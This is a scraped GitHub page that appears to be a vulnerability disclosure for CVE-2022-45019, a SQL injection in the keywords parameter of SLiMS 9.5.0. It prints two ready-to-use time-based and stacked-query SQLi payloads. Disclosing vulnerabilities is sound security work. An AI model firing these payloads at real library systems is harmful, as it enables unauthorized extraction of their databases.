Headline
CVE-2022-45019: CVE-nu11secur1ty/vendors/slims.web.id/SLIMS-9.5.0 at main · nu11secur1ty/CVE-nu11secur1ty
SLiMS 9 Bulian v9.5.0 was discovered to contain a SQL injection vulnerability via the keywords parameter.
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Latest commit
Files
Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Vendor
Description:
The keywords parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the keywords parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The injection is confirmed manually from nu11secur1ty. The attacker can retrieve all information from the database of this system, by using this vulnerability.
STATUS: HIGH Vulnerability
[+] Payload:
— Parameter: keywords (GET) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7’’’)));SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7’’’))) RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)# —
Reproduce:
href
Proof and Exploit:
href
Time spent
3:00
After:
- Multiple SQLi found.